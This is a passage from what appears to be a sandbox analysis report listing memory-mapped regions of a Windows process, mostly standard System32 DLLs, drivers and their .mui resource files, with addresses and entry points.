0xd63fff monitored = 0 entry_point = 0xd23450 region_type = mapped_file name = "lsm.exe" filename = "\\Windows\\System32\\lsm.exe" (normalized: "c:\\windows\\system32\\lsm.exe") Region: id = 3330 start_va = 0x120000 end_va = 0x121fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "lsm.exe.mui" filename = "\\Windows\\System32\\en-US\\lsm.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.exe.mui") Region: id = 3331 start_va = 0xd10000 end_va = 0xd30fff monitored = 0 entry_point = 0xd2a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3332 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3333 start_va = 0xd10000 end_va = 0xd30fff monitored = 0 entry_point = 0xd2a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3334 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3335 start_va = 0xd10000 end_va = 0xd30fff monitored = 0 entry_point = 0xd2a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3336 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3337 start_va = 0xd10000 end_va = 0xd30fff monitored = 0 entry_point = 0xd2a06c region_type = mapped_file name = "pacer.sys" filename = "\\Windows\\System32\\drivers\\pacer.sys" (normalized: "c:\\windows\\system32\\drivers\\pacer.sys") Region: id = 3338 start_va = 0x120000 end_va = 0x123fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pacer.sys.mui" filename = "\\Windows\\System32\\drivers\\en-US\\pacer.sys.mui" (normalized: "c:\\windows\\system32\\drivers\\en-us\\pacer.sys.mui") Region: id = 3339 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3340 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3341 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3342 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3343 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3344 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3345 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3346 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3347 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3348 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3349 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3350 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3351 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3352 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3353 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3354 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3355 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd568c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3356 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3357 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd568c8 region_type = mapped_file name = "pnrpsvc.dll" filename = "\\Windows\\System32\\pnrpsvc.dll" (normalized: "c:\\windows\\system32\\pnrpsvc.dll") Region: id = 3358 start_va = 0x120000 end_va = 0x122fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "pnrpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\pnrpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnrpsvc.dll.mui") Region: id = 3359 start_va = 0x11f0000 end_va = 0x12cbfff monitored = 0 entry_point = 0x1265ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3360 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3362 start_va = 0x11f0000 end_va = 0x12cbfff monitored = 0 entry_point = 0x1265ec8 region_type = mapped_file name = "azroles.dll" filename = "\\Windows\\System32\\azroles.dll" (normalized: "c:\\windows\\system32\\azroles.dll") Region: id = 3363 start_va = 0x120000 end_va = 0x120fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "azroles.dll.mui" filename = "\\Windows\\System32\\en-US\\azroles.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\azroles.dll.mui") Region: id = 3364 start_va = 0x11f0000 end_va = 0x12d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3365 start_va = 0xd10000 end_va = 0xd38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3366 start_va = 0x11f0000 end_va = 0x12d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll" filename = "\\Windows\\System32\\FXSRESM.dll" (normalized: "c:\\windows\\system32\\fxsresm.dll") Region: id = 3367 start_va = 0xd10000 end_va = 0xd38fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fxsresm.dll.mui" filename = "\\Windows\\System32\\en-US\\FXSRESM.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fxsresm.dll.mui") Region: id = 3368 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3373 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3374 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3375 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3376 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3377 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3378 start_va = 0x11f0000 end_va = 0x1298fff monitored = 0 entry_point = 0x12018d0 region_type = mapped_file name = "cscsvc.dll" filename = "\\Windows\\System32\\cscsvc.dll" (normalized: "c:\\windows\\system32\\cscsvc.dll") Region: id = 3379 start_va = 0x120000 end_va = 0x124fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\cscsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\cscsvc.dll.mui") Region: id = 3380 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3381 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3382 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3383 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3384 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3385 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3386 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3387 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3388 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3389 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3390 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3391 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3392 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3393 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3394 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3395 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3396 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3397 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3398 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3399 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3400 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3401 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3402 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3403 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3404 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3405 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3406 start_va = 0xd10000 end_va = 0xd5ffff monitored = 0 entry_point = 0xd12b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3407 start_va = 0x120000 end_va = 0x132fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "fwpuclnt.dll.mui" filename = "\\Windows\\System32\\en-US\\fwpuclnt.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\fwpuclnt.dll.mui") Region: id = 3408 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3409 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3410 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3411 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3412 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3413 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3414 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3415 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3416 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3417 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3418 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3419 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3420 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3421 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3422 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3423 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3424 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3425 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3426 start_va = 0xd10000 end_va = 0xd9afff monitored = 0 entry_point = 0xd851ec region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3427 start_va = 0x120000 end_va = 0x129fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "iphlpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\iphlpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iphlpsvc.dll.mui") Region: id = 3428 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3429 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3430 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3431 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3432 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3433 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3434 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3435 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3436 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3437 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3438 start_va = 0x120000 end_va = 0x139fff monitored = 1 entry_point = 0x121380 region_type = mapped_file name = "servicemodelperformancecounters.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ServiceModelPerformanceCounters.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\servicemodelperformancecounters.dll") Region: id = 3439 start_va = 0x150000 end_va = 0x15bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "servicemodelperformancecounters.dll.mui" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\ServiceModelPerformanceCounters.dll.mui" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\en-us\\servicemodelperformancecounters.dll.mui") Region: id = 3440 start_va = 0xd10000 end_va = 0xd37fff monitored = 0 entry_point = 0xd11860 region_type = mapped_file name = 